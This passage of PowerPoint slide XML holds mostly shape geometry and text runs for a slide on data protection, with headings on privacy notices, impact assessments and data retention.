                    <a:pt x="990516" y="679821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945768" y="688848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114934" y="688848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70187" y="679821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33654" y="655208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9028" y="618714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="574040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="11480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4655565" y="6859269"/>
            <a:ext cx="18542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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>3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978653" y="4969509"/>
            <a:ext cx="1073785" cy="701675"/>
            <a:chOff x="4978653" y="4969509"/>
            <a:chExt cx="1073785" cy="701675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4985003" y="4975859"/>
              <a:ext cx="1061085" cy="688975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1061085" h="688975">
                  <a:moveTo>
                    <a:pt x="945769" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="114935" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70187" y="9026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33654" y="33639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9028" y="70133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="114807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="574039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9028" y="618714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33655" y="655208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70187" y="679821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114935" y="688848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945769" y="688848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="990516" y="679821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027049" y="655208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051675" y="618714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060704" y="574039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060704" y="114807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051675" y="70133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027049" y="33639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="990516" y="9026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945769" y="0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985003" y="4975859"/>
              <a:ext cx="1061085" cy="688975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1061085" h="688975">
                  <a:moveTo>
                    <a:pt x="0" y="114807"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9028" y="70133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33654" y="33639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70187" y="9026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114935" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945769" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="990516" y="9026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027049" y="33639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051675" y="70133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060704" y="114807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060704" y="574039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051675" y="618714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027049" y="655208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="990516" y="679821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945769" y="688848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114935" y="688848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70187" y="679821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33655" y="655208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9028" y="618714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="574039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="11480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423408" y="5108575"/>
            <a:ext cx="18542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40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084065" y="3145282"/>
            <a:ext cx="1073785" cy="701675"/>
            <a:chOff x="4084065" y="3145282"/>
            <a:chExt cx="1073785" cy="701675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4090415" y="3151632"/>
              <a:ext cx="1061085" cy="688975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1061085" h="688975">
                  <a:moveTo>
                    <a:pt x="945769" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="114935" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70187" y="9026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33654" y="33639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9028" y="70133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="114807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="574039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9028" y="618714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33655" y="655208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70187" y="679821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114935" y="688847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945769" y="688847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="990516" y="679821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027049" y="655208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051675" y="618714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060704" y="574039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060704" y="114807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051675" y="70133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027049" y="33639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="990516" y="9026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945769" y="0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090415" y="3151632"/>
              <a:ext cx="1061085" cy="688975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1061085" h="688975">
                  <a:moveTo>
                    <a:pt x="0" y="114807"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9028" y="70133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33654" y="33639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70187" y="9026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114935" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945769" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="990516" y="9026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027049" y="33639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051675" y="70133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060704" y="114807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060704" y="574039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051675" y="618714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027049" y="655208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="990516" y="679821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945769" y="688847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114935" y="688847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70187" y="679821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33655" y="655208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9028" y="618714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="574039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="11480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4528184" y="3284601"/>
            <a:ext cx="18542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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>1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05703" y="3104514"/>
            <a:ext cx="7143115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65" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-95" b="1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65" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>notices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2200" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Defines</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>purpose</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484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1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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>collecting</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>personal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>information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83528" y="5011673"/>
            <a:ext cx="7285355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20" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-145" b="1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125" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>assessments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2200" spc="-70">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Assess</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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an</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="44484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14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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>miti</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="44484E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30">
                <a:solidFill>
                  <a:srgbClr val="44484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5">
                <a:solidFill>
                  <a:srgbClr val="44484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45">
                <a:solidFill>
                  <a:srgbClr val="44484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0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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>risk</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-85">
                <a:solidFill>
                  <a:srgbClr val="44484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1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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>fr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="44484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15">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="44484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85">
                <a:solidFill>
                  <a:srgbClr val="44484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95">
                <a:solidFill>
                  <a:srgbClr val="44484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55">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ec</a:t>
            </a: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0">
                <a:solidFill>
                  <a:srgbClr val="44484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70">
                <a:solidFill>
                  <a:srgbClr val="44484E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8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>pers</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="44484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nal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>data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05703" y="6787642"/>
            <a:ext cx="8982075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45" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-125" b="1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70" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>retention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Stores</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>securely</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>comply</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>policy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484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3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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>regulation</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484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2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>legislation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950720" y="4290059"/>
            <a:ext cx="2307590" cy="2308860"/>
            <a:chOff x="1950720" y="4290059"/>
            <a:chExt cx="2307590" cy="2308860"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="object 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1950720" y="4290059"/>
              <a:ext cx="2307590" cy="2308860"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2307590" h="2308859">
                  <a:moveTo>
                    <a:pt x="1153668" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1104900" y="1012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056648" y="4024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1008953" y="8995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961853" y="15884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="915390" y="24652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="869602" y="35259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824531" y="47664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780216" y="61828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736698" y="77710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694015" y="95270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652209" y="114469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611320" y="135266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571387" y="157621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532450" y="181493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="494550" y="206844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457726" y="233633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422019" y="261819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="387468" y="291363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354115" y="322225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321997" y="354364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291157" y="387740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261633" y="422314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233467" y="458045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206697" y="494894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181364" y="532819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157508" y="571782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135169" y="611741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114387" y="652658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95202" y="694491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77654" y="737201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61783" y="780747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="825090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35233" y="870190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24634" y="916006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15872" y="962498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8988" y="1009627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4021" y="1057352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1012" y="1105633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1154429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1012" y="1203226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4021" y="1251507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8988" y="1299232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15872" y="1346361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24634" y="1392853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35233" y="1438669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="1483769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61783" y="1528112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77654" y="1571658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95202" y="1614368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114387" y="1656201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135169" y="1697118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157508" y="1737077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181364" y="1776040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206697" y="1813965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233467" y="1850814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261633" y="1886545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291157" y="1921119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321997" y="1954495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354115" y="1986634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="387468" y="2017496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422019" y="2047040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457726" y="2075226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="494550" y="2102015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532450" y="2127366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571387" y="2151238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611320" y="2173593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652209" y="2194390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694015" y="2213589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736698" y="2231149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780216" y="2247031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824531" y="2261195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="869602" y="2273600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="915390" y="2284207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961853" y="2292975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1008953" y="2299864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056648" y="2304835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1104900" y="2307847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1153668" y="2308860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202435" y="2307847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1250687" y="2304835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1298382" y="2299864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1345482" y="2292975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1391945" y="2284207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1437733" y="2273600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482804" y="2261195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1527119" y="2247031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1570637" y="2231149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1613320" y="2213589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1655126" y="2194390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1696015" y="2173593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1735948" y="2151238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1774885" y="2127366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1812785" y="2102015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849609" y="2075226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1885316" y="2047040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1919867" y="2017496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1953220" y="1986634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1985338" y="1954495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2016178" y="1921119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045702" y="1886545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2073868" y="1850814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2100638" y="1813965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2125971" y="1776040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2149827" y="1737077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2172166" y="1697118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2192948" y="1656201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2212133" y="1614368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2229681" y="1571658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2245552" y="1528112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2259705" y="1483769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2272102" y="1438669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2282701" y="1392853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2291463" y="1346361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2298347" y="1299232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2303314" y="1251507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2306323" y="1203226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2307335" y="1154429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2306323" y="1105633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2303314" y="1057352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2298347" y="1009627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2291463" y="962498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2282701" y="916006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2272102" y="870190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2259705" y="825090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2245552" y="780747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2229681" y="737201"/>
                  </a:lnTo>
                  <a:lnTo>
